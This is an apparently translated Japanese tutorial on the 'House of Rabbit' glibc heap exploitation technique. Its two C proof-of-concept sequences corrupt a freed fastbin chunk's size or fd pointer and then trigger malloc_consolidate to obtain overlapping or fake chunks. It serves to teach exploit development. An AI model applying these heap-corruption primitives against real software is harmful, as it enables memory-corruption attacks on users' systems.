House of Rabbit

要件

1. ファストビンのfdポインタまたはサイズを変更する能力: これは、ファストビン内のチャンクの前方ポインタまたはそのサイズを変更できることを意味します。

2. malloc_consolidateをトリガーする能力: これは、大きなチャンクを割り当てるか、トップチャンクをマージすることで行うことができ、ヒープがチャンクを統合することを強制します。

目標

1. オーバーラップするチャンクを作成する: 1つのチャンクが別のチャンクとオーバーラップするようにし、さらなるヒープ操作を可能にします。

2. 偽のチャンクを作成する: ヒープ操作中にアロケータを騙して、偽のチャンクを正当なチャンクとして扱わせることです。

攻撃の手順

POC 1: ファストビンチャンクのサイズを変更する

目的: ファストビンチャンクのサイズを操作してオーバーラップするチャンクを作成します。

• ステップ 1: チャンクを割り当てる

unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x40);  // Allocates another chunk of 0x40 bytes at 0x602050
malloc(0x10);                          // Allocates a small chunk to change the fastbin state

We allocate two chunks of 0x40 bytes each. These chunks will be placed in the fast bin list once freed.

• ステップ 2: チャンクを解放する

free(chunk1);  // Frees the chunk at 0x602000
free(chunk2);  // Frees the chunk at 0x602050

We free both chunks, adding them to the fastbin list.

• ステップ 3: チャンクサイズの変更

chunk1[-1] = 0xa1;  // Modify the size of chunk1 to 0xa1 (stored just before the chunk at chunk1[-1])

We change the size metadata of chunk1 to 0xa1. This is a crucial step to trick the allocator during consolidation.

• ステップ 4: malloc_consolidate をトリガーする

malloc(0x1000);  // Allocate a large chunk to trigger heap consolidation

大きなチャンクを割り当てると、malloc_consolidate関数がトリガーされ、小さなチャンクがファストビンでマージされます。操作されたchunk1のサイズにより、chunk1がchunk2と重なります。

統合後、chunk1はchunk2と重なり、さらなる悪用が可能になります。

POC 2: fdポインタを変更する

目的: ファストビンのfdポインタを操作してフェイクチャンクを作成します。

• ステップ 1: チャンクを割り当てる

unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x602050

説明: 偽のチャンクのためにヒープを設定するために、1つは小さく、もう1つは大きい2つのチャンクを割り当てます。

• ステップ 2: 偽のチャンクを作成

chunk2[1] = 0x31;  // Fake chunk size 0x30
chunk2[7] = 0x21;  // Next fake chunk
chunk2[11] = 0x21; // Next-next fake chunk

We write fake chunk metadata into chunk2 to simulate smaller chunks.

• ステップ 3: chunk1 を解放する

free(chunk1);  // Frees the chunk at 0x602000

説明: chunk1を解放し、fastbinリストに追加します。

• ステップ 4: chunk1のfdを変更する

chunk1[0] = 0x602060;  // Modify the fd of chunk1 to point to the fake chunk within chunk2

説明: chunk1の前方ポインタ（fd）を変更して、chunk2内の偽チャンクを指すようにします。

• ステップ5: malloc_consolidateをトリガーする

malloc(5000);  // Allocate a large chunk to trigger heap consolidation

大きなチャンクを再度割り当てると、malloc_consolidateがトリガーされ、偽のチャンクが処理されます。

偽のチャンクはファストビンリストの一部となり、さらなる悪用のための正当なチャンクとなります。

概要

House of Rabbit技術は、ファストビンチャンクのサイズを変更してオーバーラップするチャンクを作成するか、fdポインタを操作して偽のチャンクを作成することを含みます。これにより、攻撃者はヒープ内に正当なチャンクを偽造し、さまざまな形態の悪用を可能にします。これらのステップを理解し、実践することで、ヒープの悪用スキルを向上させることができます。